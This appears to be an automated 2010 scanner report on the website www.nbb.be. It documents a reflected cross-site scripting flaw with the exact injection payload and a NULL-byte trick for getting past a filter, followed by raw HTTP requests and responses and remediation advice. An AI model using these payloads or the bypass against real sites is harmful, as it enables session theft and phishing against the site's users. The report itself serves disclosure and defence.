nbb.be, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSs in nbb.be | Vulnerability Crawler Report

Report generated by XSS.CX at Fri Dec 31 12:13:35 CST 2010.


Contents

Loading

1. Cross-site scripting (reflected)

2. Cookie without HttpOnly flag set

2.1. http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm

2.2. http://www.nbb.be/pub/favicon.ico

3. Content type is not specified

3.1. http://www.nbb.be/NR/rdonlyres/2AD2420E-B3D1-491E-B71C-7D616F1EA836/0/banner_ecotijd2010_12E.jpg

3.2. http://www.nbb.be/NR/rdonlyres/90CEE6E6-51DD-43BF-8FAB-84B837B274CA/6813/banner_colloque2.jpg

3.3. http://www.nbb.be/NR/rdonlyres/BF45EE56-D0E8-4DF2-A6D7-7047E93F1A86/6681/conference_en1.jpg

3.4. http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/a

3.5. http://www.nbb.be/pub/appdata/images/TopLogoen.gif

3.6. http://www.nbb.be/pub/appdata/images/external.png

3.7. http://www.nbb.be/pub/appdata/images/indexbullet.jpg

3.8. http://www.nbb.be/pub/appdata/images/target/WP_btn.jpg

3.9. http://www.nbb.be/pub/appdata/images/target/bib_btn.jpg

3.10. http://www.nbb.be/pub/appdata/images/target/eco_tijdschr_btn.jpg

3.11. http://www.nbb.be/pub/appdata/images/target/jaarverslag_btn.jpg

3.12. http://www.nbb.be/pub/appdata/js/pretab.js

3.13. http://www.nbb.be/pub/appdata/js/tabber.js

3.14. http://www.nbb.be/pub/appdata/js/tooltip.js

3.15. http://www.nbb.be/pub/appdata/styles/home.css

3.16. http://www.nbb.be/pub/appdata/styles/print.css

3.17. http://www.nbb.be/pub/appdata/styles/printhome.css

3.18. http://www.nbb.be/pub/appdata/styles/pub.css

3.19. http://www.nbb.be/pub/appdata/styles/tabs.css



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d5ce2"><img%20src%3da%20onerror%3dalert(1)>ea3a5180a62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5ce2"><img src=a onerror=alert(1)>ea3a5180a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2"><img%20src%3da%20onerror%3dalert(1)>ea3a5180a62=1 HTTP/1.1
Host: www.nbb.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 18:06:37 GMT
Set-Cookie: ASP.NET_SessionId=icg4qw45qnaop445wdlmqgnd; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26000
Connection: close
Set-Cookie: BIGipServerwco_publicweb=706521280.20480.0000; expires=Fri, 31-Dec-2010 18:21:36 GMT; path=/
Set-Cookie: TSf90149=6b83acae2727553d20d4e2cdc1888eb357cb0e32ed31a4264d1e1bac; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><Meta id="DESCRIPTION" N
...[SNIP]...
<a href="/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?l=fr&.d5ce2"><img src=a onerror=alert(1)>ea3a5180a62=1" id="_ctl0_Languages2_lhlLang0">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm HTTP/1.1
Host: www.nbb.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 18:06:18 GMT
Set-Cookie: ASP.NET_SessionId=z1ez2q45eik2y1eq1sjrma55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25346
Connection: close
Set-Cookie: BIGipServerwco_publicweb=706521280.20480.0000; expires=Fri, 31-Dec-2010 18:21:18 GMT; path=/
Set-Cookie: TSf90149=5da70292d9aa71de4f1f26fec48a87d2fb582b66b2cbd85c4d1e1b99; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><Meta id="DESCRIPTION" N
...[SNIP]...

2.2. http://www.nbb.be/pub/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/favicon.ico HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Wed, 21 Jun 2006 10:00:24 GMT
Accept-Ranges: bytes
ETag: "0ac86831995c61:3c0"
Date: Fri, 31 Dec 2010 18:09:33 GMT
Set-Cookie: BIGipServerwco_publicweb=706521280.20480.0000; expires=Fri, 31-Dec-2010 18:24:33 GMT; path=/
Set-Cookie: TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; Path=/

..............h.......(....... ........... ...#...#.........................a..uA...........q..G...^!...............Q..S...j1...........................................................................
...[SNIP]...

3. Content type is not specified  previous
There are 19 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


3.1. http://www.nbb.be/NR/rdonlyres/2AD2420E-B3D1-491E-B71C-7D616F1EA836/0/banner_ecotijd2010_12E.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /NR/rdonlyres/2AD2420E-B3D1-491E-B71C-7D616F1EA836/0/banner_ecotijd2010_12E.jpg

Request

GET /NR/rdonlyres/2AD2420E-B3D1-491E-B71C-7D616F1EA836/0/banner_ecotijd2010_12E.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267964&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.2. http://www.nbb.be/NR/rdonlyres/90CEE6E6-51DD-43BF-8FAB-84B837B274CA/6813/banner_colloque2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /NR/rdonlyres/90CEE6E6-51DD-43BF-8FAB-84B837B274CA/6813/banner_colloque2.jpg

Request

GET /NR/rdonlyres/90CEE6E6-51DD-43BF-8FAB-84B837B274CA/6813/banner_colloque2.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106933588095&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.3. http://www.nbb.be/NR/rdonlyres/BF45EE56-D0E8-4DF2-A6D7-7047E93F1A86/6681/conference_en1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /NR/rdonlyres/BF45EE56-D0E8-4DF2-A6D7-7047E93F1A86/6681/conference_en1.jpg

Request

GET /NR/rdonlyres/BF45EE56-D0E8-4DF2-A6D7-7047E93F1A86/6681/conference_en1.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267966&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.4. http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/06_00_00_00_00/06_03_01_00_00/a

Request

GET /pub/06_00_00_00_00/06_03_01_00_00/a HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267962&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.5. http://www.nbb.be/pub/appdata/images/TopLogoen.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/TopLogoen.gif

Request

GET /pub/appdata/images/TopLogoen.gif HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267958&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.6. http://www.nbb.be/pub/appdata/images/external.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/external.png

Request

GET /pub/appdata/images/external.png HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106933588097&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.7. http://www.nbb.be/pub/appdata/images/indexbullet.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/indexbullet.jpg

Request

GET /pub/appdata/images/indexbullet.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106933588101&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.8. http://www.nbb.be/pub/appdata/images/target/WP_btn.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/target/WP_btn.jpg

Request

GET /pub/appdata/images/target/WP_btn.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106933588099&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.9. http://www.nbb.be/pub/appdata/images/target/bib_btn.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/target/bib_btn.jpg

Request

GET /pub/appdata/images/target/bib_btn.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267968&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.10. http://www.nbb.be/pub/appdata/images/target/eco_tijdschr_btn.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/target/eco_tijdschr_btn.jpg

Request

GET /pub/appdata/images/target/eco_tijdschr_btn.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267972&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.11. http://www.nbb.be/pub/appdata/images/target/jaarverslag_btn.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/images/target/jaarverslag_btn.jpg

Request

GET /pub/appdata/images/target/jaarverslag_btn.jpg HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38; __utmz=255848663.1293818900.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=255848663.1603844863.1293818900.1293818900.1293818900.1; __utmc=255848663; __utmb=255848663.1.10.1293818900

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267970&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.12. http://www.nbb.be/pub/appdata/js/pretab.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/js/pretab.js

Request

GET /pub/appdata/js/pretab.js HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267938&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

